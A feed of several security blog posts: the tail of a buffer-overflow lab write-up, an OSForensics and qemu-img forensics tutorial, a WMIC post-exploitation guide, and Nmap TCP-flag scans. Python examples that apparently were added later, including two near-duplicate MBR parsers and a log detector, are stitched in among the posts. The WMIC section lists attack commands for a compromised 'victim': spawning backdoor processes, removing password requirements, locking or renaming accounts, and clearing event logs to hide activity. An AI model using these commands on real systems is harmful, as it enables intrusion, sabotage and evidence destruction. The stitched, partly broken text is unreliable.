So this file may be vulnerable to a buffer overflow. After fuzzing a few times we find that with 516 bytes of data we can overwrite the EIP and get a segmentation fault.

So we now use this to exploit this vulnerability and get a privileged shell.

Now we run the file with a 516-byte input containing our shellcode and get a privileged shell.

Now we use id command and find that we are root user now.

Author: Sayantan Bera is a technical writer at hacking articles and cyber security enthusiast. Contact Here

The post Hack the Bsides London VM 2017(Boot2Root) appeared first on Hacking Articles.

Categories: Cyber India

Digital Forensics Investigation through OS Forensics (Part 3)

Fri, 02/Feb/2018 - 15:36

In Part 2 of this article we have covered Recent Activity, Deleted File Search, Mismatch File Search, Memory Viewer and Prefetch Viewer. This article will cover some more features/ functionalities of OSForensics.

To Read Part 2 of this article click here.

Raw Disk Viewer

On a drive, data is generally stored as file system files and directories, but forensics needs a deeper inspection of the drive: evidence can be present within the raw sectors of the drive or image. These sectors are not accessible through the operating system, but we can access them through OSForensics’ Raw Disk Viewer.

Raw Disk Viewer includes text/hex searching, highlighting of relevant disk offsets, and decoding of known disk structures (such as MBR and GPT).

Source: https://www.osforensics.com
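The “decoding of known disk structures” that the viewer offers, as an added Python example that is not OSForensics' code: it parses a constructed MBR sector (the partition layout and disk signature are made up for the demo), lists the partition entries with their byte ranges, and maps a raw byte offset back to a partition, sector and in-partition offset, which is the bookkeeping you rely on when a hex search hit has to be placed on the disk. The helper names are assumptions.

```python
import struct
from typing import Dict, List, Optional, Tuple

SECTOR_SIZE = 512
MBR_SIGNATURE = b"\x55\xaa"
PARTITION_TYPES = {
    0x01: "FAT12", 0x04: "FAT16 <32M", 0x05: "extended", 0x06: "FAT16",
    0x07: "NTFS/exFAT", 0x0B: "FAT32 (CHS)", 0x0C: "FAT32 (LBA)", 0x0F: "extended (LBA)",
    0x82: "Linux swap", 0x83: "Linux", 0xEE: "GPT protective", 0xEF: "EFI system",
}


def parse_mbr(sector: bytes) -> Dict:
    """Decode sector 0 of a disk image: disk signature and the four partition entries.

    Each entry gives the partition's start LBA and sector count, which are turned
    into byte offsets so a search hit can be mapped back to the partition it lies in."""
    if len(sector) < SECTOR_SIZE:
        raise ValueError("need at least one 512-byte sector")
    if sector[510:512] != MBR_SIGNATURE:
        raise ValueError("missing 0x55AA boot signature; not an MBR")
    partitions = []
    for i in range(4):
        entry = sector[446 + 16 * i: 446 + 16 * (i + 1)]
        status, ptype = entry[0], entry[4]
        start_lba, sectors = struct.unpack_from("<II", entry, 8)
        if ptype == 0x00:
            continue   # empty slot
        partitions.append({
            "index": i, "bootable": status == 0x80, "type": ptype,
            "type_name": PARTITION_TYPES.get(ptype, f"unknown (0x{ptype:02x})"),
            "start_lba": start_lba, "sectors": sectors,
            "byte_offset": start_lba * SECTOR_SIZE,
            "byte_end": (start_lba + sectors) * SECTOR_SIZE,
        })
    return {
        "disk_signature": struct.unpack_from("<I", sector, 440)[0],
        "partitions": partitions,
        # a single 0xEE entry means the real layout is in the GPT that follows
        "gpt_protective": any(p["type"] == 0xEE for p in partitions),
    }


def locate_offset(mbr: Dict, byte_offset: int) -> Optional[Tuple[int, int, int]]:
    """Map an absolute byte offset to (partition index, sector, offset within partition)."""
    for p in mbr["partitions"]:
        if p["byte_offset"] <= byte_offset < p["byte_end"]:
            return p["index"], byte_offset // SECTOR_SIZE, byte_offset - p["byte_offset"]
    return None


def build_mbr(entries: List[Tuple[bool, int, int, int]],
              disk_signature: int = 0xC0FFEE42) -> bytes:
    """Constructed sample MBR for the demo (not taken from a real disk)."""
    sector = bytearray(SECTOR_SIZE)
    struct.pack_into("<I", sector,440, disk_signature)
    for i, (bootable, ptype, start_lba, sectors) in enumerate(entries):
        off = 446 + 16 * i
        sector[off] = 0x80 if bootable else 0x00
        sector[off + 4] = ptype
        struct.pack_into("<II", sector, off + 8, start_lba, sectors)
    sector[510:512] = MBR_SIGNATURE
    return bytes(sector)


# Constructed layout: a bootable NTFS partition at 1 MiB followed by a Linux partition.
SAMPLE_MBR = build_mbr([(True, 0x07, 2048, 204800), (False, 0x83, 206848, 409600)])

if __name__ == "__main__":
    info = parse_mbr(SAMPLE_MBR)
    for p in info["partitions"]:
        print(f"#{p['index']} {p['type_name']:14} LBA {p['start_lba']:>8} "
              f"bytes 0x{p['byte_offset']:x}-0x{p['byte_end']:x}"
              f"{' (boot)' if p['bootable'] else ''}")
    print("hit at 0x101000 ->", locate_offset(info, 0x101000))
```

A GPT disk still carries an MBR in sector 0 with a single 0xEE protective entry; the gpt_protective flag tells you to go on and decode the GPT header in sector 1 instead of trusting the legacy table.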

To start, open OSF and click on Raw Disk Viewer.

From the disk dropdown select the Evidence we want to investigate.

Click on the config button and make the required changes. We can specify the sector range limit, highlight the file types by different colors, include/exclude file system objects.

To look for a particular file/sector/offset click on the Jump To button; a screen appears where we can select any particular file or offset.

To get the details of any particular file, select File and browse to the file.

Click on Open and then OK; the file opens in hex for investigation.

Click on the decode button to get the details of the file. This will provide the cluster number and sector of the file.

Right click on the file to get all the available options of the file/offset/cluster.

Click on the Search button; a screen appears where we can search for hex or text and continue. This searches for the particular text or hex within the raw sectors and displays the result.

Click on the Bookmark button on the main screen of Raw Disk Viewer. We can create bookmarks for the relevant pieces of evidence.

Create a new bookmark by specifying its start offset and end offset. We can differentiate the bookmark through its color.

The bookmark saved will get listed .

If we click on the bookmark the offset range will get highlighted on the main screen and will mark the starting of the offset with a flag and color of the the flag is that of the bookmark.

This concludes Raw Disk Viewer.

Registry Viewer

Registry Viewer enables us to investigate the registry files of an evidence item.

To start with, open Registry Viewer and select the drive/evidence we want to work on. All the registry files in that drive/evidence get listed on the right side.

Double-click on any file to navigate through the registry keys and get all the details.

This concludes Registry Viewer.

File System Browser

File System Browser enables us to navigate the drive/evidence.

We can navigate through all the files and directories and perform multiple activities. File System Browser also exposes other OSF options such as File Search, Mismatch Search, Create Index and Create Signature. Some of these features we have already covered and the rest we will discuss in coming articles.

We can enable the “Show Deleted File” option by clicking on Tools > Option > Show Deleted File.

The deleted files/directories (if any) also get listed and are marked with a red cross.

This concludes File System Browser.

Passwords

The Passwords feature enables us to retrieve password-related information from the evidence. These could be passwords stored within browsers, Windows login passwords, and so on. We can also create a rainbow table from multiple combinations of passwords and recover passwords from it. Under OSF Passwords there is also an option to decrypt an encrypted file.

To start with, open OSF and select Passwords.

The first tab is Find Passwords & Keys; this allows us to recover stored passwords from browsers, Outlook, Windows auto-logon, etc. We can either do a live acquisition of the current machine or choose Scan Drive and select a drive or evidence item.

Click on the Config button and check the passwords you want to recover. Select the decryption settings based on requirements; we can include our own dictionary file or use an automatic dictionary. If the credentials are known, we can provide the Windows login credentials. Click OK.

Click on the Acquire Passwords button to start the process.

All the passwords/product keys get listed.

The image below shows the password acquisition of the current machine, for better understanding, as the evidence we are working on doesn't have any stored wireless network.

Select Windows Login Passwords, select the drive/evidence and click Acquire Passwords.

All the information gets listed. If there is any saved password it is listed as well, along with information about it; we also get the NT hash and LM hash of the password, from which we can recover the password.

We have an option to generate a rainbow table. This creates a list of passwords with different combinations and permutations. We can choose from the different options/combinations in the drop-down. The larger and more complex the inputs, the longer it takes.

Browse to the file path where we want to save the table and, if required, modify the parameters. Click on the Create Rainbow Table button to start the process.

The process starts, and its duration depends on the complexity.

Passwords through a rainbow table: if the password is within the rainbow table we have created and we have the NT hash and LM hash, we can recover the password (however this ). To achieve this we need to add the folder of the rainbow table under “Select Rainbow Table” and either enter the raw hash or browse to a file containing the hash; if the password is present within the rainbow table, we get the password.

In the image we are browsing to the file “hash.txt”, which we saved from Windows Login Passwords (shown above), and to the rainbow table we created.

Click on the Recover Password/s button to start the process; if the hash present in hash.txt is found in the rainbow table, we get the result.

In the above case we haven't found the password, as it must not be present inside the table. These tables also have certain limitations and a success rate of about 95%. There are other methods for password recovery as well, which we will discuss in other articles.

This concludes Passwords.

For more on OSForensics wait for the next article.

Author: Ankit Gupta, the author and co-founder of this website, is an ethical hacker, forensics investigator, penetration testing researcher and telecom expert. He has found his deepest passion to be around the world of telecom, cyber security and digital forensics. Contact Here

The post Digital Forensics Investigation through OS Forensics (Part 3) appeared first on Hacking Articles.

Categories: Cyber India

Convert Virtual Machine to Raw Images for Forensics (Qemu-Img)

Thu, 01/Feb/2018 - 11:52

This is a very handy little application, developed by the QEMU team. It is very useful when dealing with virtualization, and qemu-img is available for both Windows and Linux. Its function is to convert a given virtual disk file to most of the popular virtual disk formats used across platforms. Let's say you are using VirtualBox on Windows and want to migrate the virtual disk for use on a Mac, in Parallels; you can use this simple program to achieve that with minimum effort.

Our purpose in writing about this today is slightly different from qemu-img's mainstream usage: we want to focus on how we can use this application to convert a virtual disk image, whole or split, into a .raw file that can be used with most of the popular forensic frameworks available.

Let's start up qemu-img on our Linux machine.

At the terminal prompt type “qemu-img -h”.

This will show you all the options that can be used with qemu-img.

Right at the end of the information printed by the command above, we can see all the formats supported by this application.

Here is a list of all the formats that are compatible with qemu-img:

Now let’s see how this application comes in handy for use in forensics.

In a situation where a virtual disk is part of the acquisition and further dedicated analysis is required, the virtual disk can be converted into .raw format.

Let’s begin.

Since our goal is to analyze the virtual disk, we are using the image file of Windows 7 installed on VMware. The file in question is in .vmdk format.

Just a heads-up: when you convert a virtual disk file to a .raw file, the converted file can be quite big, so make sure you have enough space.

Here is our .vmdk file.

For ease of use, we have placed the .vmdk file in a folder named Qmeu on the desktop. The terminal is opened from within the folder.

At the terminal prompt type “qemu-img convert -f vmdk -O raw Windows\ 7.vmdk win7.raw”

A breakdown of the command that we just gave:

qemu-img convert invokes the convert function of qemu-img.

-f is the format of the input file, which in this case is vmdk.

-O is the format of the output file that we want: raw.

Windows\ 7.vmdk is the name of the input file that we have in our folder.

win7.raw is the name we have given the output file, with its file extension.

Give it a few minutes and check the folder; you will find the converted file.

As you can see, the size of the .raw file is 10.7 GB while the .vmdk file was 6.0 GB; that's quite a jump in size!

We can now use Foremost to carve the .raw file and see what's inside.

At the terminal type “foremost -t jpeg,png -i win7.raw -o output”

With this command we are carving the .raw file for .jpeg and .png files, which will be collected in a folder named output. If you have any doubts about Foremost you can refer to this article.

As you can see, our .raw file has been successfully carved; the results are visible below.

We have successfully carved a .raw file made from a virtual disk; now let's mount the .raw file to view its contents. We will be using a Windows machine for this operation.

We will mount the .raw file using FTK Imager to see its contents. The image mounting option can be found under the File menu. Navigate to the .raw file from within the mounting menu.

Select Mount, leave the other options as they are, and the file will appear in the Mapped Image List.

Next we navigate to My Computer and see that the .raw file has been mounted as a partition.

The Windows file system can be seen within and explored for content.

qemu-img is a very simple application with high potential. It can be a very valuable tool in your forensic toolkit due to its large list of compatible formats. It makes sure that the format of the acquired image does not keep you from using your forensic tool of choice to run your investigation or carve out data.
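The partition that FTK Imager mounts from win7.raw and the MBR decoding offered by OSForensics' Raw Disk Viewer both rest on the same 512-byte structure in sector 0. As an added example, not code from either tool or from the original article, here is a decoder for it in Python that also peeks at each partition's boot sector to name the file system; the disk image it runs on is constructed inline, and 512-byte sectors are assumed.

```python
import struct
from dataclasses import dataclass
from typing import List, Tuple

SECTOR = 512                     # logical sector size assumed for the raw image
MBR_SIGNATURE = b"\x55\xaa"      # bytes 510-511 of sector 0
PARTITION_TABLE_OFFSET = 446     # four 16-byte entries follow the boot code
PARTITION_ENTRY_SIZE = 16

# Common MBR partition type IDs (subset); anything else is reported by its number.
PARTITION_TYPES = {
    0x07: "NTFS/exFAT", 0x0B: "FAT32 (CHS)", 0x0C: "FAT32 (LBA)",
    0x82: "Linux swap", 0x83: "Linux", 0xEE: "GPT protective",
}


@dataclass
class Partition:
    index: int          # slot 0-3 in the MBR table
    bootable: bool      # status byte 0x80
    type_id: int
    lba_start: int      # first sector of the partition
    sector_count: int

    @property
    def byte_offset(self) -> int:
        """Offset to give a raw disk viewer's 'Jump To' to land on this volume."""
        return self.lba_start * SECTOR

    @property
    def type_name(self) -> str:
        return PARTITION_TYPES.get(self.type_id, f"0x{self.type_id:02X}")


def parse_mbr(sector0: bytes) -> List[Partition]:
    """Decode the partition table in the first sector of a raw disk image."""
    if len(sector0) < SECTOR:
        raise ValueError("need at least one full sector")
    if sector0[510:512] != MBR_SIGNATURE:
        raise ValueError("missing 0x55AA boot signature; not an MBR sector")
    parts = []
    for i in range(4):
        start = PARTITION_TABLE_OFFSET + i * PARTITION_ENTRY_SIZE
        entry = sector0[start:start + PARTITION_ENTRY_SIZE]
        # status(1) CHS start(3) type(1) CHS end(3) LBA start(4, LE) sectors(4, LE)
        status, _chs_start, ptype, _chs_end, lba, count = struct.unpack("<B3sB3sII", entry)
        if ptype == 0x00:
            continue  # empty slot
        # Type 0xEE means the real table is a GPT starting at LBA 1 (not decoded here).
        parts.append(Partition(i, status == 0x80, ptype, lba, count))
    return parts


def identify_volume(image: bytes, part: Partition) -> str:
    """Read the partition's first sector (its boot sector) and name the file system."""
    off = part.byte_offset
    vbr = image[off:off + SECTOR]
    if len(vbr) < SECTOR:
        return "truncated image"
    if vbr[3:11] == b"NTFS    ":          # NTFS OEM ID at offset 3
        return "NTFS"
    if vbr[0x52:0x5A] == b"FAT32   ":     # FAT32 file system type string
        return "FAT32"
    if vbr[0x36:0x3E] in (b"FAT12   ", b"FAT16   "):
        return vbr[0x36:0x3E].decode().strip()
    return "unknown"


def describe_image(image: bytes) -> List[Tuple[int, str, bool, int, int, str]]:
    """Per partition: slot, type name, bootable, byte offset, size in bytes, detected FS."""
    return [
        (p.index, p.type_name, p.bootable, p.byte_offset, p.sector_count * SECTOR,
         identify_volume(image, p))
        for p in parse_mbr(image[:SECTOR])
    ]


def build_sample_image() -> bytes:
    """Constructed 32-sector image standing in for win7.raw: a bootable NTFS partition
    at LBA 8 and a FAT32 partition at LBA 16. Real disks start partitions far later."""
    img = bytearray(32 * SECTOR)
    entries = [(0x80, 0x07, 8, 8), (0x00, 0x0C, 16, 8)]   # (status, type, lba, count)
    for i, (status, ptype, lba, count) in enumerate(entries):
        start = PARTITION_TABLE_OFFSET + i * PARTITION_ENTRY_SIZE
        img[start:start + PARTITION_ENTRY_SIZE] = struct.pack(
            "<B3sB3sII", status, b"\0\0\0", ptype, b"\0\0\0", lba, count)
    img[510:512] = MBR_SIGNATURE
    img[8 * SECTOR + 3:8 * SECTOR + 11] = b"NTFS    "          # NTFS boot sector OEM ID
    img[16 * SECTOR + 0x52:16 * SECTOR + 0x5A] = b"FAT32   "   # FAT32 type string
    return bytes(img)


if __name__ == "__main__":
    for row in describe_image(build_sample_image()):
        print(row)
```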

We hope you enjoy using this tool.

Have fun and stay ethical.

About The Author

Abhimanyu Dev is a Certified Ethical Hacker, penetration tester, information security analyst and researcher. Connect with him here.

The post Convert Virtual Machine to Raw Images for Forensics (Qemu-Img) appeared first on Hacking Articles.

Categories: Cyber India

Post Exploitation Using WMIC (System Command)

Wed, 31/Jan/2018 - 23:48

This article is about post-exploitation using WMIC (Windows Management Instrumentation Command-line). When an attacker gains a meterpreter session on a remote PC, he/she can enumerate a huge amount of information and make effective changes using the WMI command line.

To do this, we first get a meterpreter session on the remote PC, which you can learn about here. After gaining the session, escalate its privileges to Administrator, which you can learn about here.

The WMIC command line can be accessed through the Windows cmd. To access it, type “shell” in the meterpreter session.

Now let's look at the wmic commands and how they work.

WMIC

This command shows the global options used in the wmic command. WMIC global options set properties of the WMIC environment. Combining global options with aliases, we can manage the system through the wmic environment.

Syntax/Example: wmic /?

Get System Roles, User Name, and Manufacturer

We can enumerate lots of information about the victim system, including its name, domain, manufacturer, model number and much more, through the computersystem alias of the wmic command.

We are adding the following filters to get specific results.

Roles: gives all the roles the victim system plays, like Workstation, Server, Browser, etc.

Manufacturer: gives the manufacturer of the system; sometimes there are known vulnerabilities in a particular model from a particular manufacturer, so we can use this information to search for any direct vulnerabilities.

UserName: gives the username of the system, which proves very helpful as we can differentiate between administrators and normal users.

/format:list: formats the output as a list.

Example: wmic computersystem get Name, Domain, Manufacturer, Model, Username, Roles /format:list

Get the SIDs

To enumerate the SIDs we use the group alias of wmic.

Syntax/Example: wmic group get Caption, InstallDate, LocalAccount, Domain, SID, Status

As shown in the image below, we have found the account name, domain, local group membership status, SID and their status.

Create a process

We can create processes on the victim's system using the process alias of the wmic command.

This is helpful for running any backdoor or for filling up the memory of the victim's system.

Syntax: wmic process call create "[Process Name]"

Example: wmic process call create "taskmgr.exe"

As you can see in the screenshot below, this command not only creates a process but also returns the process ID, so that we can manipulate that process according to our need.

Note: if the process creates a window, like Task Manager, cmd, etc., this command will open that window on the victim's system and raise suspicion in the mind of the victim.

Change Priority of a Process

We can change the priority of any process running on the victim's system with the help of the process alias of the wmic command.

This is an important feature because it can be used to manipulate processes: we can increase or decrease the priority of any process of our choice. Decreasing the priority of a process can result in that application crashing, and increasing it may crash the overall system.

Example: wmic process where name="explorer.exe" call setpriority 64

Terminate a process

We can terminate a process running on the victim's system with the help of the process alias of the wmic command.

Example: wmic process where name="explorer.exe" call terminate

Get a list of Executable Files

We can get a list containing the locations of executable files outside the Windows directory.

Example: wmic process where "NOT ExecutablePath LIKE '%Windows%'" GET ExecutablePath

Get Folder Properties

To extract basic information about a folder on the victim's system we can use the fsdir alias of the wmic command line.

It can enumerate the following information about a folder:

Compressed, CompressionMethod, Creation Date, File Size, Readable, Writable, System File or not, Encrypted, Encryption Type and much more.

Example: wmic fsdir where "drive='c:' and filename='test'" get /format:list

Get File Properties

To extract basic information about a file on the victim's system we can use the datafile alias of the wmic command line.

It can enumerate the following information about a file:

Compressed, CompressionMethod, Creation Date, File Size, Readable, Writable, System File or not, Encrypted, Encryption Type and much more.

Syntax: wmic datafile where name='[Path of File]' get /format:list

Example: wmic datafile where name='c:\\windows\\system32\\demo\\demo.txt' get /format:list

Locate System Files

Extract the paths of all the important system locations like the temp folder, the Windows directory and much more.

Example: wmic environment get Description, VariableValue

From the image below you can read each VariableValue with its Description.

Get a list of Installed Applications

We can get a list of applications or software installed on the victim's system.

Example: wmic product get name

Get a list of Running Services

We can fetch the list of running services and whether they start automatically or not.

Example: wmic service where (state="running") get caption, name, startmode

From the image below you can observe the startmode as either “Auto” or “Manual” and the state “Running” for the given services.

Get Startup Services

We can enumerate startup entries using the startup alias, covering all the commands that run during Windows startup.

Example: wmic startup get Caption, Command


Get System Driver Details

We can enumerate driver details like name, path and service type using the sysdriver alias.

This command gives the path of the driver file, its status (Running or Stopped) and its type (Kernel or File System).

Example: wmic sysdriver get Caption, Name, PathName, ServiceType, State, Status /format:list

Get OS Details

We can infer the location of the victim from the time zone the system is set to; this can be extracted using the os alias.

We also get the last boot-up time, the number of registered users, the number of processes and information about physical and virtual memory, all using the os alias.

Example: wmic os get CurrentTimeZone, FreePhysicalMemory, FreeVirtualMemory, LastBootUpTime, NumberOfProcesses, NumberOfUsers, Organization, RegisteredUsers, Status /format:list

Get the Motherboard Details

We can use the baseboard alias of the wmic command line to enumerate the motherboard details of the victim's system. Things we can enumerate are the motherboard manufacturer, serial number and version.

Example: wmic baseboard get Manufacturer, Product, SerialNumber, Version

Get BIOS Serial Number

We can use the bios alias of the wmic command line to enumerate the BIOS details of the victim's system.

Example: wmic bios get SerialNumber

From the image below you can check the BIOS serial number that we have enumerated from the victim's system.

Get Hard Disk Details

We can enumerate information about the system hard disk using the diskdrive alias.

We get to know the interface type, manufacturer and model name, all through this command.

Syntax: wmic diskdrive get Name, Manufacturer, Model, InterfaceType, MediaLoaded, MediaType /format:list

Get Hard Disk Partitions Details

We can get information about the hard disk partitions using the logicaldisk alias.

We get the name, compression status, file system (NTFS, FAT) and much more, all using this command.

Syntax: wmic logicaldisk where drivetype=3 get Name, Compressed, Description, FileSystem, FreeSpace, SupportsDiskQuotas, VolumeDirty, VolumeName

From the image below you can read the description of the disk along with the file system, i.e. NTFS, the available free space and many more details as per your requirement.

Get Memory Cache Details

We can get information about the memory cache using the memcache alias. We can get the name, block size, purpose and much more, all using this command.

Example: wmic memcache get Name, BlockSize, Purpose, MaxCacheSize, Status

From the image below you can observe that it shows details of two cache memories.

Get Memory Chip Details

We can get information about the RAM using the memorychip alias.

We get the serial number of the RAM without removing it or being physically near the system using this command.

Example: wmic memorychip get PartNumber, SerialNumber

Detect if the victim system is a host OS or installed via VMware

We can determine whether the victim's system is running as a host operating system, i.e. installed directly on the hard drive, or virtually using VMware or VirtualBox.

Syntax: wmic onboarddevice get Description, DeviceType, Enabled, Status /format:list

In the image below, if you observe the highlighted text, you can see it showing VMware in the description.

User Account Management

Lock a User Account

We can restrict a local user from using their account by using the useraccount alias; here we are going to lock a user account.

Example: wmic useraccount where name='demo' set disabled=true

From the image below you can observe that we have successfully locked the user account for user “demo”.

Remove Password Requirement for Login

We can remove a local user's password requirement for login by using the useraccount alias.

Example: wmic useraccount where name='demo' set PasswordRequired=false

Rename a user account

We can rename a local user by using the useraccount alias.

Example: wmic useraccount where name='demo' rename hacker

Restrict user from changing a password

We can restrict a local user from changing their password by using the useraccount alias.

Example: wmic useraccount where name='hacker' set passwordchangeable=false

Get Antivirus Details

We can enumerate the antivirus installed on the victim's system along with its location and version.

Syntax: wmic /namespace:\\root\securitycenter2 path antivirusproduct GET displayName, productState, pathToSignedProductExe

Clear System Logs

Wmic can be used to delete system logs using the nteventlog alias. It is a very simple command where we mention the name of the log and then call the cleareventlog method on it to clear the log file. It can be an effective command while cleaning up after hacking any system.

Syntax: wmic nteventlog where filename='[logfilename]' cleareventlog

Example: wmic nteventlog where filename='system' cleareventlog
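Every command above leaves a process-creation record (Security event 4688 or Sysmon event 1) carrying the wmic.exe command line, which is what a defender hunts for. The following added example, not part of the original article, matches such command lines against the commands shown above and ranks them by impact; the one-line record format and the log records are constructed for the example.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple

# One rule per technique shown above: (rule name, severity, regex over the command line).
# Matching is case-insensitive because WMIC aliases and property names are.
WMIC_RULES: List[Tuple[str, str, str]] = [
    ("wmic_eventlog_clear", "high",
     r"\bnteventlog\b.*\bcleareventlog\b"),
    ("wmic_account_tamper", "high",
     r"\buseraccount\b.*\b(set\s+(disabled|passwordrequired|passwordchangeable)\s*=|rename\b)"),
    ("wmic_process_create", "medium",
     r"\bprocess\b.*\bcall\s+create\b"),
    ("wmic_process_tamper", "medium",
     r"\bprocess\b.*\bcall\s+(terminate|setpriority)\b"),
    ("wmic_av_discovery", "medium",
     r"securitycenter2\b.*\bantivirusproduct\b"),
    ("wmic_host_recon", "low",
     r"\b(computersystem|os|bios|baseboard|memorychip|memcache|diskdrive|logicaldisk|sysdriver"
     r"|onboarddevice|group|environment|product|service|startup|fsdir|datafile)\b.*\bget\b"),
]
COMPILED_RULES = [(name, sev, re.compile(pat, re.IGNORECASE)) for name, sev, pat in WMIC_RULES]
WMIC_INVOKED = re.compile(r"\bwmic(\.exe)?\b", re.IGNORECASE)

# Constructed process-creation records (the fields Security 4688 / Sysmon 1 provide),
# flattened to one line each. Not real telemetry.
SAMPLE_LOG = r"""
2018-01-31T23:48:10Z host=WIN7-VICTIM image=C:\Windows\System32\wbem\WMIC.exe cmdline=wmic computersystem get Name, Domain, Manufacturer, Model, Username, Roles /format:list
2018-01-31T23:49:02Z host=WIN7-VICTIM image=C:\Windows\System32\wbem\WMIC.exe cmdline=wmic useraccount where name='demo' set PasswordRequired=false
2018-01-31T23:50:41Z host=WIN7-VICTIM image=C:\Windows\System32\notepad.exe cmdline=notepad.exe C:\Users\demo\notes.txt
2018-01-31T23:51:15Z host=WIN7-VICTIM image=C:\Windows\System32\cmd.exe cmdline=cmd.exe /c wmic process call create "taskmgr.exe"
2018-01-31T23:52:30Z host=WIN7-VICTIM image=C:\Windows\System32\wbem\WMIC.exe cmdline=wmic /namespace:\\root\securitycenter2 path antivirusproduct GET displayName, productState, pathToSignedProductExe
2018-01-31T23:55:07Z host=WIN7-VICTIM image=C:\Windows\System32\wbem\WMIC.exe cmdline=wmic nteventlog where filename='system' cleareventlog
"""
RECORD_RE = re.compile(r"^(?P<ts>\S+)\s+host=(?P<host>\S+)\s+image=(?P<image>\S+)\s+cmdline=(?P<cmd>.*)$")


@dataclass
class Finding:
    timestamp: str
    host: str
    rule: str
    severity: str
    command_line: str


def match_rules(command_line: str) -> List[Tuple[str, str]]:
    """All (rule, severity) pairs the command line triggers."""
    return [(name, sev) for name, sev, rx in COMPILED_RULES if rx.search(command_line)]


def scan_log(text: str) -> List[Finding]:
    findings: List[Finding] = []
    for line in text.strip().splitlines():
        m = RECORD_RE.match(line)
        if not m:
            continue  # malformed record; a real pipeline would count these
        image, cmd = m.group("image"), m.group("cmd")
        # Only consider records where wmic.exe is the image or appears in the command
        # line (e.g. cmd.exe /c wmic ...), so unrelated processes never hit the recon rule.
        if not (WMIC_INVOKED.search(image.rsplit("\\", 1)[-1]) or WMIC_INVOKED.search(cmd)):
            continue
        for rule, sev in match_rules(cmd):
            findings.append(Finding(m.group("ts"), m.group("host"), rule, sev, cmd))
    return findings


def severity_counts(findings: List[Finding]) -> Dict[str, int]:
    counts = {"low": 0, "medium": 0, "high": 0}
    for f in findings:
        counts[f.severity] += 1
    return counts


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f.timestamp} {f.host} [{f.severity:6}] {f.rule}: {f.command_line}")
    print(severity_counts(scan_log(SAMPLE_LOG)))
```

The recon rule is deliberately low severity: administrators run those queries too, so it is the account, log and process rules that warrant an alert on their own.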

Author: Pavandeep Singh is a Technical Writer, Researcher and Penetration Tester. Contact here

The post Post Exploitation Using WMIC (System Command) appeared first on Hacking Articles.

Categories: Cyber India

Nmap Scans using Hex Value of Flags

Wed, 31/Jan/2018 - 18:33

In this article we are going to scan the target machine by sending TCP flags through their hexadecimal values; the actual flag names can be confirmed by analysing the Nmap traffic in Wireshark.

Let's have a look at the hex values of the TCP flags in the table below, which we are going to use in Nmap for port enumeration.

NULL Scan

In this scan we send a TCP packet with no flags set (NONE), using its hexadecimal value, to the target machine to enumerate whether a port is open, closed or filtered.

Now execute the command below to enumerate the state of any port; here we want to identify the state of port 21.

nmap -p21 --scanflags 0x00 192.168.1.103

From the image below you can observe that we have found port 21 filtered.

When the network admin captures the incoming traffic he will see a packet with the TCP-NONE flag; here we have used Wireshark for network packet analysis and found that it shows a TCP-NONE packet for hex value 0x00 coming from 192.168.1.104 on port 21, as shown in the image below.

FIN Scan

The TCP-FIN flag is always used to finish the communication with the target network. In this scan we send the FIN flag of TCP, using its hexadecimal value, to the target machine to enumerate whether a port is open, closed or filtered.

Now execute the command below to enumerate the state of any port; here we want to identify the state of port 21.

nmap -p21 --scanflags 0x01 192.168.1.103

From the image below you can observe that we have found port 21 filtered.

When the network admin captures the incoming traffic he will see a packet with the TCP-FIN flag; here we have used Wireshark for network packet analysis and found that it shows a TCP-FIN packet for hex value 0x01 coming from 192.168.1.104 on port 21, as shown in the image below.

SYN Scan

The TCP-SYN flag always initiates communication to establish a connection with the target network. In this scan we send the SYN flag of TCP, using its hexadecimal value, to the target machine to enumerate whether a port is open, closed or filtered.

Now execute the command below to enumerate the state of any port; here we want to identify the state of port 21.

nmap -p21 --scanflags 0x02 192.168.1.103

From the image below you can observe that we have successfully found port 21 open.

When the network admin captures the incoming traffic he will see a packet with the TCP-SYN flag; here we have used Wireshark for network packet analysis and found that it shows a TCP-SYN packet for hex value 0x02 coming from 192.168.1.104 on port 21, as shown in the image below.

Reset Scan

The RST flag is used to reset the connection between the sender machine and the target machine. In this scan we send the RST flag of TCP, using its hexadecimal value, to the target machine to enumerate whether a port is open, closed or filtered.

Now execute the command below to enumerate the state of any port; here we want to identify the state of port 21.

nmap -p21 --scanflags 0x04 192.168.1.103

From the image below you can observe that we have found port 21 filtered.

When the network admin captures the incoming traffic he will see a packet with the TCP-RST flag; here we have used Wireshark for network packet analysis and found that it shows a TCP-RST packet for hex value 0x04 coming from 192.168.1.104 on port 21, as shown in the image below.

PUSH Scan

The PUSH flag is used to push the packet's data to the target machine with higher processing priority. In this scan we send the PSH flag of TCP, using its hexadecimal value, to the target machine to enumerate whether a port is open, closed or filtered.

Now execute the command below to enumerate the state of any port; here we want to identify the state of port 21.

nmap -p21 --scanflags 0x08 192.168.1.103

From the image below you can observe that we have found port 21 filtered.

When the network admin captures the incoming traffic he will see a packet with the TCP-PSH flag; here we have used Wireshark for network packet analysis and found that it shows a TCP-PSH packet for hex value 0x08 coming from 192.168.1.104 on port 21, as shown in the image below.

ACK Scan

The ACK flag is used to acknowledge to the sender machine whether a packet was received or dropped by the target, so that the sender can resend the lost or dropped packet on the target network to complete the communication. Here we send the ACK flag of TCP, using its hexadecimal value, to the target machine to enumerate whether a port is open, closed or filtered.

Now execute the command below to enumerate the state of any port; here we want to identify the state of port 21.

nmap -p21 --scanflags 0x10 192.168.1.103

From the image below you can observe that we have found port 21 closed.

When the network admin captures the incoming traffic he will see a packet with the TCP-ACK flag; here we have used Wireshark for network packet analysis and found that it shows a TCP-ACK packet for hex value 0x10 coming from 192.168.1.104 on port 21, as shown in the image below.

Open and closed ports will both return a RST packet. Nmap then labels them as unfiltered, meaning that they are reachable by the ACK packet, but whether they are open or closed is undetermined. Ports that don’t respond, or send certain ICMP error messages back (type 3, code 0, 1, 2, 3, 9, 10, or 13), are labeled filtered. (From Nmap.org)

Urgent Scan

The URG flag is used to set a high processing priority for the packet at the target, so that the target machine stops processing the current packet and processes the URG-flagged packet. In this scan we send the URG flag of TCP, using its hexadecimal value, to the target machine to enumerate whether a port is open, closed or filtered.

Now execute the command below to enumerate the state of any port; here we want to identify the state of port 21.

nmap -p21 --scanflags 0x20 192.168.1.103

From the image below you can observe that we have found port 21 filtered.

When the network admin captures the incoming traffic he will see a packet with the TCP-URG flag; here we have used Wireshark for network packet analysis and found that it shows a TCP-URG packet for hex value 0x20 coming from 192.168.1.104 on port 21, as shown in the image below.

XMAS Scan

